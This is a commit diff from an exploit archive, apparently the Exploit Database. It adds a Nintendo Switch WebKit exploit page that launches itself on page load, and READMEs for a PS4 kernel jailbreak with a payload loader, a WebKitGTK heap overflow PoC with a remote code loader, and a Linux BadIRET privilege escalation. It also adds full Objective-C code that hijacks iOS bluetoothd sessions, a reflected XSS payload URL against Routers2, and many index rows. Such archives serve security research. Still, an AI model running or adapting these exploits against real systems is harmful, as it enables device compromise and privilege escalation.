alert(\'smash.length is now: 0x\'+smash.length.toString(16));
alert(\'done!\\nswitch will probably crash now :O\');
return;
}
}
}
}
document.getElementById(\'status\').innerText = \' fail. refresh the page and try again...\';
setTimeout(function() {document.location.reload();}, 1000);
}
function go() {
document.getElementById(\'status\').innerText = \' go! \';
dgc();
dgc();
dgc();
dgc();
dgc();
dgc();
setTimeout(go_, 500);
}
// if Switch browser is detected, auto start exploit
if(navigator.userAgent.indexOf(\'Nintendo Switch\')>-1) {
document.getElementById(\'status\').innerText = \'Found Nintendo Switch! \';
setTimeout(go, 2000);
}
</script>
</body>
</html>

26
exploits/hardware/remote/44196.md Normal file
View file

@ -0,0 +1,26 @@
# PS4 4.55 Kernel Exploit
---
## Summary
In this project you will find a full implementation of the "bpf" kernel exploit for the PlayStation 4 on 4.55. It will allow you to run arbitrary code as kernel, to allow jailbreaking and kernel-level modifications to the system. This release however, *does not* contain any code related to defeating anti-piracy mechanisms or running homebrew. This exploit does include a loader that listens for payloads on port `9020` and will execute them upon receival.
This bug was discovered by qwertyoruiopz, and can be found hosted on his website [here](http://crack.bargains/455/).
## Patches Included
The following patches are made by default in the kernel ROP chain:
1) Disable kernel write protection
2) Allow RWX (read-write-execute) memory mapping
3) Syscall instruction allowed anywhere
4) Custom system call #11 (`kexec()`) to execute arbitrary code in kernel mode
5) Allow unprivileged users to call `setuid(0)` successfully. Works as a status check, doubles as a privilege escalation.
## Notes
- Early stages, so no payloads yet, I may provide a debug menu payload later on in the day.
## Contributors
Massive credits to the following:
- [qwertyoruiopz](https://twitter.com/qwertyoruiopz)
- [Flatz](https://twitter.com/flat_z)
- Anonymous
Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44196.zip

0
exploits/hardware/remote/4522.html → exploits/ios/remote/4522.html
View file

44
exploits/linux/local/44204.md Normal file
View file

@ -0,0 +1,44 @@
# CVE-2014-1303 PoC for Linux
CVE-2014-1303 (WebKit Heap based BOF) proof of concept for Linux.
This repository demonstrates the WebKit heap based buffer overflow vulnerability (CVE-2014-1303) on **Linux**.
**NOTE:** Original exploit is written for Mac OS X and PS4 (PlayStation4).
I've ported and tested work on Ubuntu 14.04, [WebKitGTK 2.1.2](https://webkitgtk.org/releases/)
## Usage
Firstly you need to run simple web server,
```
$ python server.py
```
then
```
$ cd /path/to/webkitgtk2.1.2/
$ ./Programs/GtkLauncher http://localhost
```
You can run several tests like,
- Crash ROP (Jump to invalid address like 0xdeadbeefdeadbeef)
- Get PID (Get current PID)
- Code Execution (Load and execute payload from outer network)
- File System Dump (Dump "/dev" entries)
## Description
**exploit.html** ..... trigger vulnerability and jump to ROP chain
**scripts/roputil.js** ..... utilities for ROP building
**scripts/syscall.js** ..... syscall ROP chains
**scripts/code.js** ..... hard coded remote loader
**loader/** ..... simple remote loader (written in C)
**loader/bin2js** ..... convert binary to js variables (for loader)
## Purpose
I've created this WebKit PoC for education in my course.
I couldn't, of course, use actual PS4 console in my lecture for legal reason :(
## Reference
CVE 2014-1303 Proof Of Concept for PS4
(https://github.com/Fire30/PS4-2014-1303-POC)
Liang Chen, WEBKIT EVERYWHERE: SECURE OR NOT? [BHEU14]
(https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not.PDF)
Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44204.zip

16
exploits/linux/local/44205.md Normal file
View file

@ -0,0 +1,16 @@
# CVE-2014-9322 PoC for Linux kernel
CVE-2014-9322 (a.k.a BadIRET) proof of concept for Linux kernel.
This PoC uses only syscalls not any libraries, like pthread. Threads are implemented using raw Linux syscalls.
[Raw Linux Threads via System Calls](http://nullprogram.com/blog/2015/05/15/)
# Usage
```
$ make
```
**badiret.elf** is an ELF executable.
**badiret.bin** is a raw binary that can be used as payload.
# Reference
[Exploiting “BadIRET” vulnerability (CVE-2014-9322, Linux kernel privilege escalation)](https://blogs.bromium.com/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/)
Download: //github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44205.zip

222
exploits/multiple/dos/44215.m Normal file
View file

@ -0,0 +1,222 @@
//
// main.m
// bluetoothdPoC
//
// Created by Rani Idan.
// Copyright © 2018 zLabs. All rights reserved.
//
#import "AppDelegate.h"
#include <mach/mach.h>
extern kern_return_t bootstrap_look_up(mach_port_t bs, const char *service_name, mach_port_t *service);
/* When hijacking session between bluetoothd and client, add callback to the client and jump to CALLBACK_ADDRESS with CALLBACK_ADDITIONAL_DATA */
#define CALLBACK_ADDRESS 0xdeadbeef
#define CALLBACK_ADDITIONAL_DATA 0x13371337
#define BLUETOOTHD_CONST 0xFA300
#define BLUETOOTHD_WRONG_TOKEN 7
#define BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_RECV_SIZE 0x44
#define BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_SEND_SIZE 0x48
#define BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_OPTIONS 0x113
#define BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_MSG_ID 3
#define BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_TIMEOUT 0x1000
#define BLUETOOTHD_MIG_SERVER_NAME "com.apple.server.bluetooth"
#define ADD_CALLBACK_MACH_MSG_OUT_RETURN_VALUE_OFFSET 0x20
#define ADD_CALLBACK_MACH_MSG_IN_SESSION_TOKEN_OFFSET 0x20
#define ADD_CALLBACK_MACH_MSG_IN_CALLBACK_ADDRESS_OFFSET 0x28
#define ADD_CALLBACK_MACH_MSG_IN_CALLBACK_DATA 0x40
typedef unsigned int mach_msg_return_value;
mach_port_t get_service_port(char *service_name)
{
kern_return_t ret = KERN_SUCCESS;
mach_port_t service_port = MACH_PORT_NULL;
mach_port_t bs = MACH_PORT_NULL;
ret = task_get_bootstrap_port(mach_task_self(), &bs);
ret = bootstrap_look_up(bootstrap_port, service_name, &service_port);
if (ret)
{
NSLog(@"Couldn't find port for %s",service_name);
return MACH_PORT_NULL;
}
NSLog(@"Got port: %x", service_port);
mach_port_deallocate(mach_task_self(), bs);
return service_port;
}
mach_msg_return_value BTLocalDevice_add_callback(mach_port_t bluetoothd_port, mach_port_t session_token, void* callback_address, long additional_data)
{
mach_port_t receive_port = MACH_PORT_NULL;
mach_msg_header_t * message = NULL;
char *data = NULL;
kern_return_t ret = KERN_SUCCESS;
mach_msg_return_value return_value = 0;
mach_msg_id_t msgh_id = BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_MSG_ID;
mach_msg_size_t recv_size = BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_RECV_SIZE;
mach_msg_size_t send_size = BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_SEND_SIZE;
mach_msg_option_t options = BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_OPTIONS;
mach_msg_size_t msg_size = MAX(recv_size, send_size);
ret = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &receive_port);
if ( ret != KERN_SUCCESS)
{
return_value = -3;
NSLog(@"Failed to allocate port ret=%x", ret);
NSLog(@"mach_error_string: mach_error_string %s", mach_error_string(ret));
goto cleanup;
}
ret = mach_port_insert_right(mach_task_self(), receive_port, receive_port, MACH_MSG_TYPE_MAKE_SEND);
if ( ret != KERN_SUCCESS)
{
return_value = -3;
NSLog(@"Failed to insert port right ret=%x", ret);
NSLog(@"mach_error_string: mach_error_string %s", mach_error_string(ret));
goto cleanup;
}
message = malloc(msg_size);
data = (char *)message;
memset(message, 0, msg_size);
*((mach_port_t *)(data+ADD_CALLBACK_MACH_MSG_IN_SESSION_TOKEN_OFFSET)) = session_token;
*((void **)(data+ADD_CALLBACK_MACH_MSG_IN_CALLBACK_ADDRESS_OFFSET)) = callback_address;
*((long *)(data+ADD_CALLBACK_MACH_MSG_IN_CALLBACK_DATA)) = additional_data;
message->msgh_bits = 0x1513 ;
message->msgh_remote_port = bluetoothd_port; /* Request port */
message->msgh_local_port = receive_port; /* Reply port */
message->msgh_size = send_size; /* Message size */
message->msgh_reserved = 0;
message->msgh_id = BLUETOOTHD_CONST + msgh_id;
ret = mach_msg(message, /* The header */
options, /* Flags */
send_size, /* Send size */
recv_size, /* Max receive Size */
receive_port, /* Receive port */
BLUETOOTHD_MACH_MESSAGE_ADD_CALLBACK_TIMEOUT, /* No timeout */
MACH_PORT_NULL); /* No notification */
if(MACH_MSG_SUCCESS == ret)
{
return_value = *(mach_msg_return_value *) (((char *) message) + ADD_CALLBACK_MACH_MSG_OUT_RETURN_VALUE_OFFSET);
if (return_value != BLUETOOTHD_WRONG_TOKEN) {
NSLog(@"Sent message id %d with token %x, returned: %x", msgh_id, session_token, return_value);
}
} else if (MACH_RCV_INVALID_NAME == ret)
{
NSLog(@"mach_error_string: mach_error_string %s", mach_error_string(ret));
NSLog(@"mach_error_int: ret=%x", ret);
NSLog(@"mach_remote_port: %x", message->msgh_remote_port);
return_value = -2;
}
else {
NSLog(@"mach_error_string: mach_error_string %s", mach_error_string(ret));
NSLog(@"mach_error_int: ret=%x", ret);
NSLog(@"mach_remote_port: %x", message->msgh_remote_port);
return_value = -1;
}
cleanup:
if(MACH_PORT_NULL != receive_port)
{
mach_port_destroy(mach_task_self(), receive_port);
}
if (NULL != message) {
free(message);
}
return return_value;
}
void try_to_add_callback_BTLocalDeviceAddCallbacks(void * address, long value)
{
int ports_found[0xffff] = {0};
int number_of_ports_found = 0;
mach_port_t bluetoothd_port = get_service_port(BLUETOOTHD_MIG_SERVER_NAME);
if (MACH_PORT_NULL == bluetoothd_port)
{
NSLog(@"Couldn't have bluetoothd port");
return;
}
NSLog(@"Starting to look for session tokens");
for (int i = 0; i <= 0xffff; i++) {
int id = 0;
id = (i << 16) + 1;
int result_code = BTLocalDevice_add_callback(bluetoothd_port, id, NULL, 0);
if(result_code != BLUETOOTHD_WRONG_TOKEN && result_code != -1)
{
NSLog(@"Found port: %x", id);
ports_found[number_of_ports_found] = id;
number_of_ports_found ++;
}
id = (i << 16) + 2;
result_code = BTLocalDevice_add_callback(bluetoothd_port, id, NULL, 0);
if(result_code != BLUETOOTHD_WRONG_TOKEN && result_code != -1)
{
NSLog(@"Found port: %x", id);
ports_found[number_of_ports_found] = id;
number_of_ports_found ++;
}
id = (i << 16);
result_code = BTLocalDevice_add_callback(bluetoothd_port, id, NULL, 0);
if(result_code != BLUETOOTHD_WRONG_TOKEN && result_code != -1)
{
NSLog(@"Found port: %x", id);
ports_found[number_of_ports_found] = id;
number_of_ports_found ++;
}
}
for (int i = number_of_ports_found-1; i>=0; i--) {
NSLog(@"Adding callback: Port=%x address=%x value=%x", ports_found[i], (unsigned int)address, (unsigned int)value);
BTLocalDevice_add_callback(bluetoothd_port, ports_found[i],address, value);
}
NSLog(@"Done");
return;
}
void trigger() {
try_to_add_callback_BTLocalDeviceAddCallbacks((void *)CALLBACK_ADDRESS, CALLBACK_ADDITIONAL_DATA);
}
int main(int argc, char * argv[]) {
trigger();
}

27
exploits/perl/webapps/44216.txt Normal file
View file

@ -0,0 +1,27 @@
# Exploit Title: Routers2 2.24 - Reflected Cross-Site Scripting
# Date: 18-01-18
# Vendor Homepage: http://www.steveshipway.org/software/
# Software Link: https://github.com/sshipway/routers2
# Version: 2.24
# CVE: CVE-2018-6193
# Platform: Perl
# Category: webapps
# Exploit Author: Lorenzo Di Fuccia
# Contact: lorenzo.difuccia@gmail.com
# Website: https://github.com/lorenzodifuccia
1. Description
Routers2 is vulnerable to Reflected Cross-Site Scripting, affecting the 'rtr' GET parameter in a page=graph action to `cgi-bin/routers2.pl`.
2. Proof of Concept
http://router.com/cgi-bin/routers2.pl?rtr=--><script>alert("XSS")</script>&bars=Cami&xgtype=d&page=graph&xgstyle=l2&xmtype=routers
3. Solution
Update the program cloning the repo from GitHub or disable the 'paranoia' setting in the web section of the `routers2.conf`.
4. References
https://github.com/sshipway/routers2/issues/1

0
exploits/hardware/local/14727.py → exploits/windows/local/14727.py
View file

27
files_exploits.csv
View file

@ -5878,6 +5878,10 @@ id,file,description,date,author,type,platform,port
44183,exploits/linux/dos/44183.py,"Asterisk chan_pjsip 15.2.0 - 'SDP fmtp' Denial of Service",2018-02-27,EnableSecurity,dos,linux,5060
44184,exploits/linux/dos/44184.py,"Asterisk chan_pjsip 15.2.0 - 'SUBSCRIBE' Stack Corruption",2018-02-27,EnableSecurity,dos,linux,5060
44189,exploits/windows/dos/44189.py,"Microsoft Windows Windows 8.1/2012 R2 - SMB Denial of Service",2018-02-27,"Nabeel Ahmed",dos,windows,
44197,exploits/hardware/dos/44197.md,"Sony Playstation 4 (PS4) 5.01 < 5.05 - WebKit Code Execution (PoC)",2018-02-27,ALEXZZZ9,dos,hardware,
44211,exploits/freebsd_x86-64/dos/44211.c,"FreeBSD Kernel (FreeBSD 10.2 < 10.3 x64) - 'SETFKEY' (PoC)",2016-05-29,CTurt,dos,freebsd_x86-64,
44212,exploits/freebsd_x86-64/dos/44212.c,"FreeBSD Kernel (FreeBSD 10.2 x64) - 'sendmsg' Kernel Heap Overflow (PoC)",2016-05-29,CTurt,dos,freebsd_x86-64,
44215,exploits/multiple/dos/44215.m,"Apple iOS 11.2.5 / watchOS 4.2.2 / tvOS 11.2.5 - 'bluetoothd' Memory Corruption",2018-02-28,"Zimperium zLabs Team",dos,multiple,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -7032,7 +7036,7 @@ id,file,description,date,author,type,platform,port
14503,exploits/windows/local/14503.pl,"HTML Email Creator 2.42 build 718 - Local Buffer Overflow (SEH)",2010-07-29,Madjix,local,windows,
14527,exploits/windows/local/14527.pl,"WM Downloader 3.1.2.2 - Local Buffer Overflow (1)",2010-08-02,s-dz,local,windows,
14532,exploits/windows/local/14532.py,"Mini-stream RM-MP3 Converter/WMDownloader/ASX to MP3 Converter - Local Stack Buffer Overflow",2010-08-02,"Praveen Darshanam",local,windows,
14538,exploits/ios/local/14538.txt,"Apple iOS - '.pdf' Jailbreak",2010-08-03,jailbreakme,local,ios,
14538,exploits/ios/local/14538.txt,"Apple iOS - '.pdf' Local Privilege Escalation / Jailbreak",2010-08-03,jailbreakme,local,ios,
14550,exploits/windows/local/14550.py,"Easy RM to MP3 2.7.3.700 - '.m3u' / '.pls' / '.smi' / '.wpl' / '.wax' / '.wvx' / '.ram' Local Overflow",2010-08-04,"Oh Yaw Theng",local,windows,
14566,exploits/windows/local/14566.c,"Microsoft Windows - 'win32k.sys' Driver 'CreateDIBPalette()' Local Buffer Overflow",2010-08-06,Arkon,local,windows,
14576,exploits/windows/local/14576.c,"Mini-stream Ripper 3.1.2.1 - Local Buffer Overflow (DEP Bypass)",2010-08-07,"fl0 fl0w",local,windows,
@ -7054,7 +7058,7 @@ id,file,description,date,author,type,platform,port
14720,exploits/windows/local/14720.rb,"MicroP 0.1.1.1600 - 'mppl' Local Buffer Overflow",2010-08-23,"James Fitts",local,windows,
14721,exploits/windows/local/14721.c,"Wireshark 1.2.10 - 'airpcap.dll' DLL Hijacking",2010-08-24,TheLeader,local,windows,
14723,exploits/windows/local/14723.c,"Microsoft PowerPoint 2010 - 'pptimpconv.dll' DLL Hijacking",2010-08-24,TheLeader,local,windows,
14727,exploits/hardware/local/14727.py,"Foxit Reader 4.0 - '.pdf' Jailbreak",2010-08-24,"Jose Miguel Esparza",local,hardware,
14727,exploits/windows/local/14727.py,"Foxit Reader 4.0 - '.pdf' Multiple Stack Based Buffer Overflow / Jailbreak",2010-08-24,"Jose Miguel Esparza",local,windows,
14726,exploits/windows/local/14726.c,"uTorrent 2.0.3 - 'plugin_dll.dll' DLL Hijacking",2010-08-24,TheLeader,local,windows,
14728,exploits/windows/local/14728.c,"Microsoft Windows Live Email - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Nicolas Krassas",local,windows,
14730,exploits/windows/local/14730.c,"Mozilla Firefox 3.6.8 - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Glafkos Charalambous",local,windows,
@ -8489,7 +8493,7 @@ id,file,description,date,author,type,platform,port
25703,exploits/solaris/local/25703.txt,"Active News Manager - 'login.asp' SQL Injection",2005-05-25,Romty,local,solaris,
25707,exploits/linux/local/25707.txt,"Linux Kernel 2.6.x - Cryptoloop Information Disclosure",2005-05-26,"Markku-Juhani O. Saarinen",local,linux,
25709,exploits/linux/local/25709.sh,"Gentoo Webapp-Config 1.10 - Insecure File Creation",2005-05-26,"Eric Romang",local,linux,
25718,exploits/hardware/local/25718.txt,"Sony Playstation 3 (PS3) 4.31 - Save Game Preview '.SFO' File Handling Local Command Execution",2013-05-26,Vulnerability-Lab,local,hardware,
25718,exploits/hardware/local/25718.txt,"Sony Playstation 3 (PS3) 4.31 - Save Game Preview '.SFO' Handling Local Command Execution",2013-05-26,Vulnerability-Lab,local,hardware,
25725,exploits/windows/local/25725.rb,"AdobeCollabSync - Local Buffer Overflow / Adobe Reader X Sandbox Bypass (Metasploit)",2013-05-26,Metasploit,local,windows,
40392,exploits/linux/local/40392.py,"EKG Gadu 1.9~pre+r2855-3+b1 - Local Buffer Overflow",2016-09-19,"Juan Sacco",local,linux,
25789,exploits/linux/local/25789.c,"FUSE 2.2/2.3 - Local Information Disclosure",2005-06-06,"Miklos Szeredi",local,linux,
@ -9330,7 +9334,7 @@ id,file,description,date,author,type,platform,port
43359,exploits/linux/local/43359.c,"Firejail < 0.9.44.4 / < 0.9.38.8 LTS - Local Sandbox Escape",2017-01-04,"Sebastian Krahmer",local,linux,
43366,exploits/windows/local/43366.md,"TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change",2017-12-04,gellin,local,windows,
43390,exploits/windows/local/43390.txt,"Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation",2017-12-26,"Julien Ahrens",local,windows,
43397,exploits/bsd/local/43397.md,"Sony Playstation 4 4.05 FW - Local Kernel Loader",2017-12-27,Specter,local,bsd,
43397,exploits/hardware/local/43397.md,"Sony Playstation 4 (PS4) 4.05 - Jailbreak (WebKit / 'namedobj ' Kernel Loader)",2017-12-27,Specter,local,hardware,
43418,exploits/linux/local/43418.c,"Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP)",2017-08-13,"Andrey Konovalov",local,linux,
43421,exploits/windows/local/43421.py,"Kingsoft Antivirus/Internet Security 9+ - Local Privilege Escalation",2018-01-03,mr_me,local,windows,
43427,exploits/multiple/local/43427.c,"Multiple CPUs - 'Spectre' Information Disclosure",2018-01-03,Multiple,local,multiple,
@ -9543,7 +9547,14 @@ id,file,description,date,author,type,platform,port
44167,exploits/windows_x86/local/44167.c,"NoMachine < 6.0.80 (x86) - 'nxfuse' Privilege Escalation",2018-02-22,"Fidus InfoSecurity",local,windows_x86,
44168,exploits/windows_x86-64/local/44168.py,"NoMachine < 6.0.80 (x64) - 'nxfuse' Privilege Escalation",2018-02-22,"Fidus InfoSecurity",local,windows_x86-64,
44169,exploits/windows/local/44169.txt,"Armadito Antivirus 0.12.7.2 - Detection Bypass",2018-02-22,"Souhail Hammou",local,windows,
44177,exploits/bsd/local/44177.c,"Sony Playstation 4 4.55 FW - Local Kernel",2018-02-26,qwertyoruiop,local,bsd,
44177,exploits/hardware/local/44177.c,"Sony Playstation 4 (PS4) 4.07 < 4.55 - 'bpf' Local Kernel Code Execution (PoC)",2018-02-26,qwertyoruiop,local,hardware,
44198,exploits/hardware/local/44198.md,"Sony Playstation 4 (PS4) 3.50 < 4.07 - WebKit Code Execution (PoC)",2017-04-08,Specter,local,hardware,
44199,exploits/hardware/local/44199.md,"Sony Playstation 4 (PS4) 3.15 < 3.55 - WebKit Code Execution (PoC)",2016-09-06,"TJ Corley",local,hardware,
44200,exploits/hardware/local/44200.md,"Sony Playstation 3 (PS3) < 2.50 - WebKit Code Execution (PoC)",2016-04-21,"TJ Corley",local,hardware,
44204,exploits/linux/local/44204.md,"WebKitGTK 2.1.2 (Ubuntu 14.04) - Heap based Buffer Overflow",2017-08-19,"Ren Kimura",local,linux,
44205,exploits/linux/local/44205.md,"Linux Kernel - 'BadIRET' Local Privilege Escalation",2017-07-24,"Ren Kimura",local,linux,
44206,exploits/hardware/local/44206.c,"Sony Playstation 4 (PS4) 1.76 - 'dlclose' Linux Loader",2016-04-27,"Carlos Pizarro",local,hardware,
44213,exploits/hardware/local/44213.html,"Nintendo Switch - WebKit Code Execution (PoC)",2017-03-12,LiveOverflow,local,hardware,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -10355,7 +10366,7 @@ id,file,description,date,author,type,platform,port
4488,exploits/windows/remote/4488.html,"Pegasus Imaging ImagXpress 8.0 - Arbitrary File Overwrite",2007-10-05,shinnai,remote,windows,
4506,exploits/windows/remote/4506.html,"Microsoft Visual FoxPro 6.0 - 'FPOLE.OCX' Arbitrary Command Execution",2007-10-09,shinnai,remote,windows,
4514,exploits/linux/remote/4514.c,"Eggdrop Server Module Message Handling - Remote Buffer Overflow",2007-10-10,bangus/magnum,remote,linux,
4522,exploits/hardware/remote/4522.html,"Apple iTouch/iPhone 1.1.1 - '.tif' File Remote Jailbreak",2007-10-11,"Niacin & Dre",remote,hardware,
4522,exploits/ios/remote/4522.html,"Apple iTouch/iPhone 1.1.1 - '.tif' Remote Privilege Escalation / Jailbreak",2007-10-11,"Niacin & Dre",remote,ios,
4526,exploits/windows/remote/4526.html,"PBEmail 7 - ActiveX Edition Insecure Method",2007-10-12,Katatafish,remote,windows,
4530,exploits/multiple/remote/4530.pl,"Apache Tomcat - 'WebDAV' Remote File Disclosure",2007-10-14,eliteboy,remote,multiple,
4533,exploits/linux/remote/4533.c,"eXtremail 2.1.1 - 'LOGIN' Remote Stack Overflow",2007-10-15,mu-b,remote,linux,4501
@ -16265,6 +16276,7 @@ id,file,description,date,author,type,platform,port
44175,exploits/windows/remote/44175.rb,"CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit)",2018-02-26,Metasploit,remote,windows,8888
44176,exploits/hardware/remote/44176.rb,"AsusWRT LAN - Unauthenticated Remote Code Execution (Metasploit)",2018-02-26,Metasploit,remote,hardware,9999
44187,exploits/windows/remote/44187.py,"GetGo Download Manager 5.3.0.2712 - Buffer Overflow (SEH)",2018-02-27,bzyo,remote,windows,
44196,exploits/hardware/remote/44196.md,"Sony Playstation 4 (PS4) 4.55 - Jailbreak (WebKit 5.01 / 'bpf' Kernel Loader 4.55)",2018-02-27,Specter,remote,hardware,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -38121,7 +38133,7 @@ id,file,description,date,author,type,platform,port
44071,exploits/windows/webapps/44071.md,"IDERA Uptime Monitor 7.8 - Multiple Vulnerabilities",2017-06-08,SecuriTeam,webapps,windows,
44072,exploits/hardware/webapps/44072.md,"Geneko Routers - Unauthenticated Path Traversal",2017-07-16,SecuriTeam,webapps,hardware,
44074,exploits/hardware/webapps/44074.md,"Dasan Networks GPON ONT WiFi Router H640X 12.02-01121 / 2.77p1-1124 / 3.03p2-1146 - Unauthenticated Remote Code Execution",2017-12-06,SecuriTeam,webapps,hardware,
44098,exploits/asp/webapps/44098.txt,"EPIC MyChart - SQL Injection",2018-02-16,"Shayan S",webapps,asp,443
44098,exploits/asp/webapps/44098.txt,"EPIC MyChart - X-Path Injection",2018-02-16,"Shayan S",webapps,asp,443
44100,exploits/php/webapps/44100.txt,"TV - Video Subscription - Authentication Bypass SQL Injection",2018-02-16,L0RD,webapps,php,80
44101,exploits/php/webapps/44101.py,"UserSpice 4.3 - Blind SQL Injection",2018-02-16,"Dolev Farhi",webapps,php,80
44102,exploits/php/webapps/44102.txt,"Twig < 2.4.4 - Server Side Template Injection",2018-02-16,JameelNabbo,webapps,php,80
@ -38924,3 +38936,4 @@ id,file,description,date,author,type,platform,port
44191,exploits/php/webapps/44191.txt,"School Management Script 3.0.4 - Authentication Bypass",2018-02-27,"Samiran Santra",webapps,php,
44192,exploits/php/webapps/44192.txt,"CMS Made Simple 2.1.6 - Remote Code Execution",2018-02-27,"Keerati T.",webapps,php,
44194,exploits/php/webapps/44194.py,"Concrete5 < 8.3.0 - Username / Comments Enumeration",2018-02-27,"Chapman Schleiss",webapps,php,
44216,exploits/perl/webapps/44216.txt,"Routers2 2.24 - Cross-Site Scripting",2018-02-28,"Lorenzo Di Fuccia",webapps,perl,

Can't render this file because it is too large.